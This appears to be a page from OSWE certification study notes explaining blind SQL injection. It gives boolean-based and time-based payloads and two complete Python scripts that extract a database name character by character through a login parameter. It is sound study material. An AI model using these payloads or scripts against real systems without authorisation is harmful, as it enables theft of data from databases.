💻
OSWE Everything
💻
OSWE Everything
  • VULNERABILITIES
    • Type Juggling
    • Cross Site Scripting
      • Hunting for files
    • Insecure Deserialization
      • .NET
    • SQL Injection
      • Blind SQL Injection
      • SQLi debugging
      • Code review
      • Errors and additional information
      • Approaches to leverage different databases
    • XML External Entity (XXE)
      • Types of XML Entities
      • Exploitation
      • Wrappers for errors
      • Post Exploitation
    • OS Command Injection
      • Exploitation
    • Server Side Template Injection
      • Exploitation
    • Authentication Bypass
      • Checklist
  • Unsecure Random Function
    • Exploitation
  • Cross Origin Resource Sharing (CORS)
    • Prerequisites of Exploitation
  • Client Side Request Forgery (CSRF)
    • Prerequisites of Exploitation
  • Exploit Writing
    • Cheatsheet
    • Skeleton Scripts
  • Code review
    • Manual code review
      • Routing
      • Searching for exploits
      • Debugging
    • Decompilation
      • Java
      • .NET
    • Managing the application
      • Identifying application file location
      • Restarting web applications
      • Manipulation of Assembly Attributes for Debugging (.NET)
  • Preparation Machines
    • [HTB] Vault
    • Other HTB scripts
  • ADDITIONAL INFORMATION
    • Sources
  • External Resources
    • WhiteBox Pentest
Powered by GitBook
On this page
  • Exploiting Blind SQL Injection
  • Extracting data through Blind SQL Injection
  • Boolean based
  • Time based
  • Writing a script
  • Time based
  • Boolean based
  1. VULNERABILITIES
  2. SQL Injection

Blind SQL Injection

Exploiting Blind SQL Injection

Many modern applications in these days do not return full error messages to the end user. This approach makes SQL Injection more difficult since the attacker is not able to see outcome of injected SQL queries directly. This is why in order to get data from SQL Injections we have to automate the process using custom made scripts or SQLMap.

Extracting data through Blind SQL Injection

Since we cannot get the query output directly we have to choose an approach depending on the Blind SQL Injection type.

Boolean based

When it comes to boolean based SQL Injection the first thing you should do is see the difference depending of the outcome of the following commands:

The output from these commands will enable the script to determine difference between the outcome of inserting commands.

' AND 1=1 -- # true
' AND 1=0 -- # false

The next step - extracting information. You can extract data from the database using conditions like:

This checks whether the ASCII value of the first character of the database name is greater than 64 (A).

' AND ASCII(SUBSTRING((SELECT database()), 1, 1)) > 64 --

Time based

Time based SQL Injection is harder to exploit since we as the attacker have to wait at least one second for result which makes a big difference during exploitation of huge chunks of data.

Confirm that the vulnerability exists (SLEEP command can differ depending on the underlying software)

' OR SLEEP(5) --

Sample extraction of database name:

Check if the database starts with letter t. If the statement passes the application will sleep for 5 seconds.

' OR IF(SUBSTRING((SELECT DATABASE()), 1, 1) = 't', SLEEP(5), 0) --

Writing a script

Since we know the logic behind exploiting this type of vulnerability we can begin to create a script for both subtypes of Blind SQL Injection.

Time based

import requests
import time

url = "http://example.com/vulnerable_page"
output = ""

# Extracting the database name character by character
for position in range(1, 21):  # Assuming the name is at most 20 characters
    for ascii_code in range(32, 127):  # Printable ASCII range
        payload = f"' OR IF(ASCII(SUBSTRING((SELECT database()), {position}, 1)) = {ascii_code}, SLEEP(5), 0) -- "
        params = {"username": payload, "password": "password123"}  # Adjust parameters as needed

        # Measure response time
        start_time = time.time()
        response = requests.get(url, params=params)
        elapsed_time = time.time() - start_time

        # Check if response time indicates true
        if elapsed_time > 5:  # Adjust threshold if needed
            output += chr(ascii_code)
            print(f"Found character: {chr(ascii_code)}")
            break

print(f"Database name: {output}")

Boolean based

import requests

url = "http://example.com/vulnerable_page"
output = ""

# Extracting the database name character by character
for position in range(1, 21):  # Assuming the name is at most 20 characters
    for ascii_code in range(32, 127):  # Printable ASCII range
        payload = f"' AND ASCII(SUBSTRING((SELECT database()), {position}, 1)) = {ascii_code} -- "
        params = {"username": payload, "password": "password123"}  # Adjust parameters as needed
        
        # Send the request
        response = requests.get(url, params=params)
        
        # Check the response behavior (e.g., content length or keyword)
        if "Welcome" in response.text:  # Adjust based on true/false response
            output += chr(ascii_code)
            print(f"Found character: {chr(ascii_code)}")
            break

print(f"Database name: {output}")

PreviousSQL InjectionNextSQLi debugging

Last updated 5 months ago